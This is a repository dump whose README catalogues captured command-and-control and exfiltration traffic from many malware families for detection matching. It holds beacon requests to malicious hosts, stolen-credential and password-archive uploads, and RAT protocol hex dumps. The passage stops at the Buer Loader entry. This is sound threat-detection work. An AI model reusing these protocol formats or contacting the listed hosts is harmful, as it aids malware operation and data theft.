Repository: silence-is-best/c2db
Branch: master
Commit: 6a2b4752fb6e
Files: 6
Total size: 214.9 KB

Directory structure:
gitextract_zx49xygj/
├── .gitignore
├── README.md
└── pcaps/
    ├── .gitkeep
    ├── acbackdoor.pcap
    ├── acbackdoor.txt
    └── backstage.pcap

================================================
FILE CONTENTS
================================================

================================================
FILE: .gitignore
================================================
.DS_Store

================================================
FILE: README.md
================================================
### A repo for matching on known c2 and exfil traffic keywords (ctrl+f to search)

#### ACBackdoor
Hash: 907e1dfde652b17338d307b6a13a5af7a8f6ced93a7a71f7f65d40123b93f2b8

Pcap: (https://github.com/silence-is-best/c2db/blob/master/pcaps/acbackdoor.pcap) and sslkeyfile: (https://github.com/silence-is-best/c2db/blob/master/pcaps/acbackdoor.txt)
~~~
POST / HTTP/1.1
Host: 193.29.15.147
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Accept: */*
Access-Control: aW5mbw==
X-Access: c22ed12456e9eb9844eafe80f3d8c080
Content-Length: 48
Content-Type: application/x-www-form-urlencoded

NTI6NTQ6MDA6NEE6QUQ6MjEKV2luZG93cwp4ODZfNjQKMC41

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Date: Mon, 11 Nov 2019 13:55:27 GMT
Content-Length: 0
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/acbackdoor.png "ACBackdoor")

#### AgentTesla
ftp:
~~~
Time: 11/25/2019 17:48:57
User Name: admin
Computer Name: USER-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 4095.61 MB

URL:https://www.facebook.com/
Username:honey@pot.com
Password:honeypass356
Application:Chrome

URL:192.168.1.1
Username:honey@pot.com
Password:honeypass356
Application:Outlook

~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/agentteslaftp.png "AgentTesla FTP")

http:
~~~
POST /zin/WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: megaplast.co.rs
Content-Length: 308
Expect: 100-continue
Connection: Keep-Alive

HTTP/1.1 100 Continue

p=G1DZYwdIiDZ6V83seaZCmTT0wiCyOlXVS0OEx4YpkUAOuKO/6hfQJ%2BZD2LjpTbyu9w0gudjYXCIc0Ul74wtsvtqYLYuTR%2BlFVl%2B5deG0RnTTo6nFc1M9tx0%2BRo7WXetRdIHkmVMMSeqH%2BEroM7yttDzosvKfKgB%2BJ07oqT/YvQ6CPNW2%2BCETCU6oIlO9XYyrEy6/hYeF%2BgkfRc9xSEfZhh/7Wk0khJ4zZJ3cjEvXDxJcQWA739/yDUy4kOAndihYsWnLw1mVCHxJSJf7%2BguB9f4DpgX10NLpH
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/agenttesla-http.png "AgentTesla HTTP")

smtp exfil:
~~~
From: office@larbaxpo[.]com
To: officelogs@larbaxpo[.]com
Date: 9 Oct 2019 17:58:19 +0100
Subject: admin/USER-PC Recovered Cookies
Content-Type: multipart/mixed; boundary=--boundary_0_cac7ba32-e0f8-42d4-8b2e-71d1828e6ff7

----boundary_0_cac7ba32-e0f8-42d4-8b2e-71d1828e6ff7
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

Time: 10/09/2019 17:58:13
UserName: admin
ComputerName: USE= R-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Int= el(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 3583.61 MB
IP: 18= 5.183.107.236=0A
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/agenttesla-submission.png "AgentTesla Submission")

#### Amadey
~~~
POST /madapam/index.php HTTP/1.1
Host: bolsaooma.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

id=6289217249&sd=MMMMMM&vs=1.43&ar=0&bi=0&lv=0&os=9&av=0&pc=USER-PC&un=admin&

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Oct 2019 06:20:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6
Connection: close
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/amadey.png "Amadey")

#### Arechclient2
~~~
....+.{"Type":"EncryptionStatus","Status":"Off"}
....&.{"Type":"ConnectionType","ConnectionType":"Client","SessionID":"191003337","BotName":"admin","BotOS":"Microsoft Windows 7 Professional "}
....-.{"Type":"SessionID","SessionID":"191003337"}
......{"Type":"AfkSystem"}
....).{"Type":"ServerAfkSystem","Status":"ok"}
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/arechclient2.png "Arechclient2")

#### Artraloader
~~~
POST /kvs06v.php HTTP/1.0
Host: onlinejohnline99.org
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-length: 97

SNI=VTFS.QD&UME=Xjoepxt!8!Qspgfttjpobm&OPQ=benjo&IVR=VTFS.QD$$benjoAA11482.572.3314613.96675&st=0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 0
Date: Mon, 26 Aug 2019 21:33:28 GMT
Server: LiteSpeed
Connection: close

POST /Engset.php HTTP/1.0
Host: hewle.kielsoservice.net
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-length: 126

BCDEF=EFTLUPQ.KHMMKME&MNOPQ=Xjoepxt!21!Qsp&GHIJ=benjo&UVWXYZ=EFTLUPQ.KHMMKME$$benjoAAcc:37f65.f4db.51ge.bf:1.3875452f88:3&st=0
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/artra.png "Artraloader")

#### Avemaria, aka ave_maria, warzone rat
~~~
00000000 09 12 3b 42 2d 33 a2 44 fc 01 86 73              ..;B-3.D ...s
00000000 09 12 3b 42 f7 33 a2 44 fd 01 86 73 69 3d ae 12  ..;B.3.D ...si=..
00000010 bb c6 19 fd 1a 3a f3 11 c9 ae da 3c 30 bc 38 81  .....:.. ...<0.8.
00000020 fc 00 0f ca 4e fb 05 c6 de b7 3c 6f 4e 01 a2 87  ....N... ..
00000060 f1 79 73 5d 9f 1c c4 8e 1a c5 16 20 71 5e 55 06  .ys].... ... q^U.
00000070 21 7b 8d 35 de 00 25 5d 6f d7 f2 ca a3 ea ef 73  !{.5..%] o......s
00000080 90 1f 6e 10 d3 b1 0a 56 17 71 3b 48 bd 5c d9 36  ..n....V .q;H.\.6
00000090 7e b4 f1 76 46 b8 48 ca 45 1e cd 66 90 d5 67 6b  ~..vF.H. E..f..gk
000000A0 aa b7 98 ed 9d df 7e 36 c0 78 87 6b 56 03 86 67  ......~6 .x.kV..g
000000B0 1f ed bb 9e e6 78 aa d5 94 e3 0e e2 c0 5e c7 87  .....x.. .....^..
000000C0 57 60 34 e4 06 ea 10 ae 6e 38 c3 ca af 01 e2 2c  W`4..... n8.....,
000000D0 ea d4 26 f9 3a 05 83 f7 aa 59 db 01 f5 2b 40 1e  ..&.:... .Y...+@.
000000E0 74 28 36 1f ac 03                                t(6...
0000000C 09 12 3b 42 2d 33 a2 44 dc 01 86 73              ..;B-3.D ...s
000000E6 09 12 3b 42 29 33 a2 44 eb 01 86 73 bc 8d c4 e7  ..;B)3.D ...s....
00000018 09 12 3b 42 5d d9 a2 44 e2 01 86 73 bc 8d c4 e7  ..;B]..D ...s....
00000028 ca 69 41 01 ab 12 30 ff ae 64 2d 93 dc 65 53 9b  .iA...0. .d-..eS.
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/avemaria.png "Avemaria")
~~~
con|1597172877123|285|ZTkyNGVhNzkxMjU1N2RlZHxKT05BVEhBTi1QQ1xKb25hdGhhbnwpMiBEdW8gICAgIFQ3NzAwICwgU3RhbmRhcmQgVkdBIEdyYXBoaWNzIEFkYXB0ZXJ8V2luIDcgICh4NjQpfFRXVm5ZVVIxYlhCbGNpQXhMakFnWW5rZ1EyOWtaVU55WVdOclpYSWdMeUJUYmtRPXwwZCAwaCAwbSAwc3w3NjZ8LXwwfDQgR2lCfE4vQXwyMzA0fDE5Mi4xNjguMTAwLjEwMXwxfC0xfERlZmF1bHQ=@
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/avemaria2.png "Avemaria")
~~~
00000000 17 69 89 31 17 60 ba b0 02 23 a9 79              .i.1.`.. .#.y
00000000 17 69 89 31 ab 60 ba b0 03 23 a9 79 ba 5d bb 30  .i.1.`.. .#.y.].0
00000010 0f 57 5c a6 38 ca da 21 2a 61 66 45 19 f7 7f c6  .W\.8..! *afE....
00000020 58 09 d3 89 cd 36 fe 88 43 f9 a3 33 40 f7 84 1c  X....6.. C..3@...
00000030 19 47 dd 80 1c f2 e0 a4 8b af b9 f1 f7 25 53 48  .G...... .....%SH
00000040 69 a0 32 da c8 1d 3e 07 38 44 3d 5d d6 e8 79 c8  i.2...>. 8D=]..y.
00000050 aa ff bc d4 11 48 8d 9b b2 6a 8e 7b 9a 9c b7 da  .....H.. .j.{....
00000060 b5 fb d6 74 f1 e3 48 88 db 08 bf bf dd d8 a3 3a  ...t..H. .......:
00000070 11 c0 4c 98 8d 0e f7 4f 2a 1d 19 12 25 dd ff 72  ..L....O *...%..r
00000080 69 6e 43 c3 db 76 a1 05 2b 6b ef b6 29 8d 52 88  inC..v.. +k..).R.
00000090 db 6e 9b 5b 77 e0 34 57 33 79 7b 95 72 60 65 cb  .n.[w.4W 3y{.r`e.
000000A0 f7 38 3c f0 12 82 d6 1c 71 12 f7 26 e3 1a b9 49  .8<..... q..&...I
000000B0 c8 eb 46 0f 54 cb f0 35 9c 3e 4d 08 7b 9f 4b 72  ..F.T..5 .>M.{.Kr
000000C0 d5 c3 27 da 27 51 47 de                          ..'.'QG.
0000000C 17 69 89 31 17 60 ba b0 2a 23 a9 79              .i.1.`.. *#.y
00000018 17 69 89 31 5f 60 ba b0 20 23 a9 79 79 fa d3 d9  .i.1_`.. #.yy...
00000028 1d 44 2c 26 8a c9 f5 58 76 a2 3e f6 1c 79 65 06  .D,&...X v.>..ye.
00000038 23 08 a7 89 d7 34 8c 88 36 f9 ca 33 35 f7 aa 1c  #....4.. 6..35...
00000048 72 47 b9 80 3f f2 c1 a4 e7 af 97 f1 db 25 31 48  rG..?... .....%1H
00000058 4a a0 14 da ab 1d 4e 07 57 44 7e 5d 42 a2 a0 0b  J.....N. WD~]B...
00000068 2d f8 d9 d4                                      -...
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/avemaria3.png "Avemaria")

#### Azorult
POST retrieve method, a unique pattern with lots of '/' and '(' characters in the body:
~~~
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 51.38.76.57
Content-Length: 103
Cache-Control: no-cache

J/.8/.:/.O.(8.I/.>/.9/.>K.>8.N/.I/.;/.:.NL.?N.>8.(9.L/.8/.H.(9.(9.(9.(9.I
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/azorult.png "Azorult")

#### Backstage aka Powerkatz
Hash: b4e270dce231fd01c326f0828a3c5ad80012ebb932842aa8e420575859406fac

Pcap: (https://github.com/silence-is-best/c2db/blob/master/pcaps/backstage.pcap)
~~~
POST /index.php/api/fb HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Length: 933
Host: www.wdsfw34erf93.com

data=[...]

HTTP/1.1 200 OK
Date: Wed, 23 Sep 2020 12:30:29 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

aHxNfWdKSTNnW1BsUm1JPA==
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/backstage.png "Backstage")

#### Bandook RAT
~~~
00000000 64 4f 7a 54 30 46 72 56 44 51 4c 30 6f 32 49 48  dOzT0FrV DQL0o2IH
00000010 6f 70 46 6c 31 69 37 48 4c 35 48 48 54 4f 6e 66  opFl1i7H L5HHTOnf
00000020 6f 30 55 72 6a 47 7a 48 30 61 30 4f 62 54 37 69  o0UrjGzH 0a0ObT7i
00000030 45 42 64 2b 54 4e 6a 4f 72 77 74 44 6d 4c 57 52  EBd+TNjO rwtDmLWR
00000040 59 54 68 6f 36 6b 4c 2f 42 38 33 43 4d 75 49 2b  YTho6kL/ B83CMuI+
00000050 6e 34 46 5a 55 66 49 4a 2f 70 6e 31 32 6a 62 73  n4FZUfIJ /pn12jbs
00000060 4c 2f 4c 79 54 73 42 73 76 63 48 66 6e 6b 4a 53  L/LyTsBs vcHfnkJS
00000070 5a 6a 6b 4b 59 34 2b 54 4b 48 44 76 6c 54 32 52  ZjkKY4+T KHDvlT2R
00000080 59 57 69 59 4a 70 54 48 6d 70 68 4f 70 51 4d 47  YWiYJpTH mphOpQMG
00000090 6d 77 3d 3d 26 26 26                             mw==&&&
00000000 64 4f 7a 54 30 46 6f 3d                          dOzT0Fo=
00000097 64 4f 7a 54 30 46 76 56 44 51 3d 3d 26 26 26     dOzT0FvV DQ==&&&
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/bandook.png "Bandook")

#### Bazaloader/Bazabackdoor
~~~
GET /pool/job/priority/normal HTTP/1.1
Cookie: HSID=u4EATrsU%2BccZ%2F317LbjgmA6QPLukoI06IX0jiIvsbHOtjThVcMc92Dn08M2eDuWDH3MXcwNO6x4HFg0uhoT3p5tzHh28ab1XyEHdCk4GpfRVj4fFDrtCYi0Z7sk59slweik4TdcpZ4MQqVDfR7i8JaXDN3lfmAVyp9wV34FGGWkgTSFVeGGwKIGhd%2BLkkCWtoMEDoB1YCQHNbEGIlQRAcdKu1uPCDJzOnFivkkiS71IUUX2LacOB1rJ4404HcKP8NmivQ10vy9KBA6uURsQt77zwUX5aicItO3YXJ6HD67TIVa5jhVBlYi1YMJ35SVCbxrFOudvjK23gUjwPFswweQ%3D%3D;SIDCC=t1vgfZ5T9hmjM2bXEHqETxQJ%2FD6%2FO8Ni273vVwk0WctwmufD6uy%2FovmzIi349CWnTEkov0mEC8GyV5nN4fVxwHY1uHsACM5Kc4tfTzwuwN1%2F0h5aMXEBX1whQXEkw4YqIYuRI8KVICQyLmDi%2BjFQoZwzvRbyJpaoHrCalnA1ezNYvJwlt3XbytQL%2BJOR3%2FJ%2FzCfBIxzBTN7%2BwE04D03ROPBs3B8IE53QrE5%2BMQP8Jv6kI74o8%2BsJS5W29bMn01WV49OAdfMlzMKZquOoBC4zvSuaZU5tpNkPwPJJLeUaXEnuAyNSxj7uDJNdM0jkIb%2FhokOijY77%2FRe2YjrfjaofeQ%3D%3D;SID=uSFINuTAOqFt2EPgZrdxIDpmVT0LFTCzEnYCzNVuvjeHwTBqJoL7hyueBhvQPeiMI6Nmu4bXbTrdBfx6xK49K%2BmDMRaftQ%2BPJXDoiVMrab3IPnD9SEffK9OONpXj8FfDX%2FRFrzgLPd0XtGuT9L0jMQSoV4ztrGpcqZ54K1E4Sg28YfuvG31rUZvgtlktnMEh%2FvxkOrPX3z%2Fx1EwTmXLaumiweiKkhAT4ZBrqgG5bf%2FGP%2Bof9hoY8te34a4Zfs9gJxzq0ZqO9KRQf66al%2BGKGIPzcR2hIhPjG1JfqTAYb5OYxVSgMCDViAV3lSuR0vou0KAvsbk650gwGQPLSJWJHVw%3D%3D;SSID=39cuio0XzqpWy0DLG4NZ9X1ZMTAf29t378zdWUbCKP81IPRp4HMFojBN6OZn%2B1sSaPpNWiCiX6GUC5dwNwGhOIs1RUN0eLQYmLADWX290GSSm62UmtD5WrV85WV5iOLJEsXiYIbNdYKQ%2BHpZHDzSfY5%2BzCsghZYIi3FCR96tUt9gJxGB4jEMSUzhtNDCEQyvx4H906IG2s7dmA8WbJA%2B0nZ9rCH6u5%2FpQfwM9DFxiELNl4wvEGGz1L%2BBtRrYKkPfULuPKjACSkdo86GJuCbgxVDVBlboB3F7fyvJt2OwwMeK77hYqhgryk3K%2BJnRQgDntdgR4H8MMSBgI9vVnaFvYA%3D%3D;
X-Tag: gz7XdHGoT%2FJKHRjpIamqqoB1AGoy3qdIedXMY5OWHeizgooQ%2BXMI1BHsqRgAobELwQbdqjEONQBZSbXe2hni0t4YDbKmvjrX3%2BRBiPD3u6kO6UWdSRmXR17Ixb6yU3qT3LoJBGcU%2FQA9pwudVzaAVyQA3BkziY6qLdqeo4ZFaNBYTubbPZZhiOELF6UdCa22VYyzIYBSC0pxN8l4itAKsrQL%2FVjxKAXj1SDOyK4DLFgNae%2Fqs0MvckMO2xUEVucj8cI2UMRTJ73ZFJ05REyx%2ByOX83q6qu%2FrV4DM1IxuQDw8h4CMb56EZgY4yeDIrumVGz7LqX1jxb38KADWnBUbfw%3D%3D
X-Csrf-Token: rykCu%2BVHJ2bEINA3xxHcfV2w7cRN6ZUaQJWyTdqK0CUQU0rXSZNMUG7Z5ve5o14t0lrePa4eYZVcAtpMlDJpIOMCa3Lk2qaleYNHaQM8%2F41wtLEo5SozmFoUeqRi9f%2BXnWxYr3vzdx3XpRGqkCWXTKuyIE%2BSwDyX7yvuxXjHWaf4qak%2FQ6Uz4NMcDnMwFiKwxLkIk2X%2FK16znremUZ0qP0HaoWjl3%2F5k7zVDBWuU%2FZahGvms4QQxkpAdKT5yFQT9OYz8M52hGRAAWR%2FEDy8hqLK2b2po3YfP3YF%2FM2yNi4uLq%2FP%2BDKEA9i0nEKKe%2BrLf%2BpUjpZ%2Fl5jbeolIOH0bZNg%3D%3D
X-Request-ID: k54ZVOB5jq2e2LHM6gvpHzLleRRD68OXJsJFZLG4cOG5hjWDtf2BIk%2BKrd2RlZDnrcYBjLAGGchBQl9G4CNZFDi4dizDjbTHTo6acwxaJHSuq54M6aL4YpIzkziT4F%2FSAcrnqoxwF5Vy%2BBurRUzVpIIArTbpcN7WSO%2BANlBUayw7nW6MUZ0PtCHQXxlTgt5qGcBqn9IlsFeQtwyRa1TgA2FXTYVWJHm923yDurCV0CmkI0qTI2GujJWG5OcAZqqhwGHmCmxZDMONv248RGjGSHeDibSGbGDxah6rRqKqg4vx9YDFR92dx7iEyWeQhSMkHQnc0JV%2FC0thtgmkjj68Sg%3D%3D
Host: 195.123.211.5

HTTP/1.1 200 OK
Server: nginx/1.10.3
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: keep-alive
Date: Thu, 24 Jun 2021 19:26:18 GMT
Set-Cookie: DV=5ssdw9_D40TpEC3m
Set-Cookie: fr=312725
Set-Cookie: NID=Ca2zDxRCiyvVM6sKhctvLJ2Vrys8Ld2uuXrfUhxg5JW00EZxGAyJooDyiky8504Oh_hZSHzfzOYLt_JEjY0VvGN-jnKRWLL-EZxdCPhDH937LrOkqwduARCJFTf4Onb49DNYiV5EYKD2cXAOhZl8hukrtGjHqtPrQD6en3BFOpws4X4pFBXz53RPD8lmRLcmLXWws3qrKoyJo8A_eFuUABvqvA7eJTJZ7dZO3NIRC1oZixRhdNytbVzI1PFJOQBY
Set-Cookie: datr=b4n4l%2BdMcUiAk3BgfGSx3CvY5IBMiR%2Fz0LdmGzvzAULKDgDHLpUbf6eH8AAwBG5q5IjuegyO0LPkEZRCqmiPKM9OvVT9eBEiG7RX9Yn%2FN1v43Km09B9fvjxOau6QEfOUzPjazm%2FdRhkTTEA4Q28oe8neeqRwVpH7PTRp0%2BzWPNxjv1uNhfPls1Iq%2B97zGmNxeKcGvE3mFaQPuuMif%2FzN5Hltrm56QnnfyEJ6PDvC8FdJS%2B4Tdasn3VpV1CXKXYvcFvb5kVkQnuqvXF3a6hlx1BZXQQsK8Ls3p6Q0lZO1VgnstYpKccmW7QEekMs5USUUyE2ZDZOyunRod%2Bmci5ePzQ%3D%3D
Set-Cookie: SID=433278
Set-Cookie: HSID=750848
Set-Cookie: SNID=FwxJ05MkOfvPjHLjx6_ECANXTqnfF4KazSvYfbsQxuDqwnRw3sQ6-ziG9cSOdz4PyizA1Q6eTWM7xRHA3NOE7Lcl8F7ulbBRjRdUtZc5WDn0_DSHjyYIReH0O0bJOtVgLaRhNa6lrQqJPl36FUfacLEbEQ5qX7X8tXf4t216rGOxVdPI075mn6YSPT_boPA2CMcGphwO6Voz1telbeiu__Y7weWCii9xW_YtYdCK5P8PNMhN7fZvvkmTKcP0e-aw
Set-Cookie: CGIC=cdXhUoYzwvog7mCeJBtGk9ntKIXXtJNmxhbrvLXvvKW2T_v7LPVGISh_UA
Set-Cookie: SSID=false
Set-Cookie: stamp=192153
Vary: Accept

OK
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/baza.png "Bazaloader")

#### Betabot
~~~
POST /forum3/logout.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: russk9.icu
Content-Length: 664
Cache-Control: no-cache

bcjkr=386731&dgpsben=2019162b8cf358952f71fa238d6ecbcd6c424d692427445f&fkvalqbgr[...]

[...]
Server: nginx/1.16.1
Date: Mon, 28 Oct 2019 23:47:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.38

..._...+...<.f........}..........?...yg.4.....#.Q...p...1yy.u..N?.ueg.v....EO......K.:....R.]......zv...3@j..
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/betabot.png "Betabot")

#### BitRAT
Hash: 9e11c859c27b3696188e8b9ad95513dcc0a61980232dc4bf455df5d6f4454e46
~~~
con|1601670957699|281|MTE0NGRlZjhiNzc4ODM5ZXxKT05BVEhBTi1QQ1xKb25hdGhhbnwpMiBEdW8gICAgIFQ3NzAwICwgU3RhbmRhcmQgVkdBIEdyYXBoaWNzIEFkYXB0ZXJ8V2luIDcgICh4NjQpfFFXUnRhVzVwYzNSeVlYUnZjam9nUTI5dGJXRnVaQ0JRY205dGNIUT18MGQgMGggMG0gMHN8MTEwfC18MHw0IEdpQnxOL0F8MjUxNnwxOTIuMTY4LjEwMC4xMDF8MXwtMXxEZWZhdWx0fDEuMzA=@
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/bitrat.png "BitRAT")

#### Bitter RAT (Patchwork)
~~~
GET /ourtyaz/qwe.php?TIe=%3a116%3ad48.2431.52b5.c69e.3c86b%3a961e3g*Vtfs.QD*%3aACme%3b%217%2f2%2f8712%21Tfswjdf%21Qbdl%212 HTTP/1.1
Host: frameworksupport.net
Connection: close

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 74
Date: Sat, 12 Jan 2019 02:44:27 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: close

90059c37-1320-41a4-b58d-2b75a9850d2f 78.109.23.2 User-PC EXE: ## SIZE: ## AXE: ## SIZE: #45#SRE: ##
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/bitter.png "Bitter RAT")

#### Bladabindi aka nJrat
~~~
147.ll1990MURFTUFZT19DNEJBMzY0Nw==1990USER-PC1990admin199018-03-2619901990Win 7 Professional SP1 x861990No1990N/A1990..1990UHJvZ3JhbSBNYW5hZ2VyAA==1990123.inf1990MURFTUFZTw0KMWRlbWF5by5kdWNrZG5zLm9yZzoxOTkwDQp2NC4wLjMwMzE5DQpSZWdTdmNzLmV4ZQ0KRmFsc2UNCkZhbHNlDQpGYWxzZQ0KRmFsc2U=15.CAP199035199023926.CAP1990......JFIF.....`.`.....C........... .
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/njrat.png "Bladabindi - nJrat")

#### Blacknet
~~~
GET /black/BlackNETPanel/receive.php?command=UGluZw==&vicID=SGFjS2VkX0M0QkEzNjQ3 HTTP/1.1
Host: meublesinde.in

HTTP/1.1 200 OK
Date: Fri, 17 Jan 2020 19:49:47 GMT
Server: Apache
X-Powered-By: PHP/7.1.33
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/blacknet.png "Blacknet")

#### Blackrat aka blackremote
~~~
9.............................>Clientx, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null......ProClient.Data.....data.bytes.............102622021F20414A5644044411072A755821285E472B1826013113651A28101927225D5B1037185F69394B2911291A1A3F031C113F696C1442754978280A031673281879480C2843582C0B032E41737D7E5B5C7A0F7C0D7521
...............................>Clientx, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null......ProClient.Data.....data.bytes..........."1A3A0F03142D5055131F585605383F4051
...............................J2085182040988060201, Version=1.0.7.0, Culture=neutral, PublicKeyToken=null..... BlackRAT.Data.....data.bytes...........(102622021F20415F0818765B27312642512C3103
...............................J2085182040988060201, Version=1.0.7.0, Culture=neutral, PublicKeyToken=null..... BlackRAT.Data.....data.bytes............123C3803363F73570B0552
..$............................J2085182040988060201, Version=1.0.7.0, Culture=neutral, PublicKeyToken=null..... BlackRAT.Data.....data.bytes.............16310D190E2C4918020E52
..........$...MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/blackrat.png "Blackrat") #### Borr ~~~ HTTP/1.1 100 Continue POST /Auth/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 92.63.197.188 Content-Length: 203 Expect: 100-continue Connection: Keep-Alive type=login&username=n3L9rdjJe47G%2bCRzL%2fTwmQ%3d%3d&password=n3L9rdjJe47G%2bCRzL%2fTwmQ%3d%3d&hwid=lsd&session_id=ejQ5U3JwREpZV0k4d21DTU85WHdlTXVTN2lEQ2hkMzI%3d&session_salt=ejQ5U3JwREpZV0k4d21DTQ%3d%3d HTTP/1.1 200 OK Date: Thu, 30 Jan 2020 01:53:02 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 24 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 ZZRTKdEbowHH5njhG6UW5w== GET /gate.php HTTP/1.1 Host: 5.188.60.21 Connection: Keep-Alive HTTP/1.1 200 OK Date: Thu, 30 Jan 2020 01:53:02 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 56 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 1,1,1,1,1,1,1,2,1,txt;cs;mp3;,https://url.com/file.exeHTTP/1.1 200 OK Date: Thu, 30 Jan 2020 01:53:02 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 56 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 1,1,1,1,1,1,1,2,1,txt;cs;mp3;,https://url.com/file.exeHTTP/1.1 100 Continue POST /gate.php?id=1&os=Windows%207&cookie=10&pswd=3&version=v1.0%20Beta&cc=0&autofill=2&hwid=90059C37132041A4B58D2B75A9850D2F HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d7a52725dea892 Host: 5.188.60.21 Content-Length: 60824 Expect: 100-continue -----------------------8d7a52725dea892 Content-Disposition: form-data; name="file"; filename="381.zip" Content-Type: application/octet-stream PK..........>P\ZWW..........$.Browsers.txt . .........0.5.....0.5.....0.5.....s.. -N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S..*8..).%5-.4.D.,.Y..a.B.y....._.......Y..._..P.....Z..).t....TV.....@........U....mA..@n:..#..d...PK..........>P~ ......L.....$.Domains.txt . 
.........0.5.....0.5.....0.5.....+//.......I../J..*G. ...PK..........>Pr.............$.Outlook.txt . ..........[:......[:......[:.......,.I..s.,I......PK..........>P^.]I........ .$.Passwords.txt . .........0.5.....0.5.....0.5.......A.. .E.$....4...+S.q..+`.....0XOoMl....'...5.).s..8;b.Jpv....p8..MX......."......63'.>..{... . .........0.5.....................PK..-.........>P..............$........ ......CryptoWallets/ . ..........[:......[:......[:.....PK........... ........ -----------------------8d7a52725dea892-- HTTP/1.1 200 OK Date: Thu, 30 Jan 2020 01:53:05 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 56 Content-Type: text/html; charset=UTF-8 1,1,1,1,1,1,1,2,1,txt;cs;mp3;,https://url.com/file.exe ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/borr1.png "Borr") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/borr2.png "Borr") #### Brushaloader ~~~ POST / HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: patromink.xyz Content-Length: 47 Connection: Keep-Alive Cache-Control: no-cache k=6292&n=6292&m=6292&id=droniks34&m=6292&l=6292 HTTP/1.1 200 OK Server: nginx/1.16.1 Date: Thu, 31 Oct 2019 17:51:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Thank You 22501 ~~~ ~~~ try {"6f7074696f6e73ProcessorId"; $disks = gwmi Win32_Volume -filter "Name='C:\\'";$disks.SerialNumber}catch{"null"} 6f7074696f6e73ProcessorId 3300537927 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/brushaloader.png "Brushaloader") #### Buer Loader ~~~ GET 
